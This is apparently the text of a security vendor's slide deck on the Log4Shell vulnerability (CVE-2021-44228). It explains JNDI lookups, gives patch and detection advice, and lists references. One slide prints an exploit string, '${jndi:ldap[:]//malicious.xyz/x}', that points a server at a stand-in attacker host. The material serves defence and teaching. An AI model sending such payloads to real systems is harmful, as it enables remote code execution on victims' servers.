On December 9th, researchers uncovered a zero-day critical vulnerability in the Apache Log4j library used by millions of Java applications. CVE-2021-44228 or “Log4Shell” is a RCE vulnerability that allows attackers to execute arbitrary code and potentially take full control over an infected system. The vulnerability has been ranked a 10/10 on the CVSSv3 severity scale.
While the Apache Foundation has already released a patch for this CVE, it can take weeks or months for vendors to update their software, and there are already widespread scans being conducted by malicious attackers to exploit Log4Shell.
What should companies or organizations do?
Join Marco Preuss, Head of Europe’s Global Research and Analysis (GReAT) team, Marc Rivero and Dan Demeter, Senior Security Researchers with GReAT, for an in-depth discussion on Log4Shell and a live Q&A session.
To see the full webinar, please visit: https://securelist.com/webinars/log4shell-vulnerability-how-to-stay-secure/?utm_source=Slideshare&utm_medium=partner&utm_campaign=gl_jespo_je0066&utm_content=link&utm_term=gl_Slideshare_organic_s966w1tou5a0snh
2. We are
Global Research and Analysis Team
Operational since 2008
Globally distributed elite threats research group
APTs, complex and highly
sophisticated targeted
attacks, big threats against
banks/financial institutions,
firmware threats…
5. 5
Exploiting example:
${jndi:ldap[:]//malicious.xyz/x}
${jndi:[service]://[host].[port]/[path]}
JNDI: Java Naming and Directory Interface
LDAP: Lightweight Directory Access Protocol
JNDI is a JAVA-internal API or SPI (Service Provider Interface)
e.g. methods to query information based on names like LDAP, DNS,
NIS, CORBA etc.
Some things to know
https://en.wikipedia.org/wiki/Java_Naming_and_Directory_Interface
HTTP request
15. 15
D
Alternative if you can not patch
Mitigate as outlined by Apache.org¹
use WAF, IPS, Webserver-block-rules
use IDS, Yara, Sigma for detection
C Check Logs
Monitor application logs
use IDS and tools to identify
attacks
B
Update log4j 2
latest version: 2.16.0
https://logging.apache.org/log4j/2.x
/download.html
A
Identify installed log4j
check your running software
Solve/mitigate
CVE-2021-44228
What organisations should do
¹https://logging.apache.org/log4j/2.x/security.html
Kaspersky products protect!
- UMIDS:Intrusion.Generic.CVE-2021-44228.*
- PDM:Exploit.Win32.Generic
16. 16
further references/reading/material
Websites:
• Securelist: https://securelist.com/cve-2021-44228-vulnerability-in-apache-log4j-library/105210/
• NCSC (NL): https://github.com/NCSC-NL/log4shell
• Blocklist by Costin Raiu and Markus Neis: https://github.com/craiu/iocs/tree/main/log4shell
• Apache Log4j 2 official security: https://logging.apache.org/log4j/2.x/security.html
Twitter:
• Marc Rivero López: @Seifreed
• Dan Demeter: @_xdanx
• Marco Preuss: @marco_preuss
Feel free to follow on LinkedIn and other channels as well!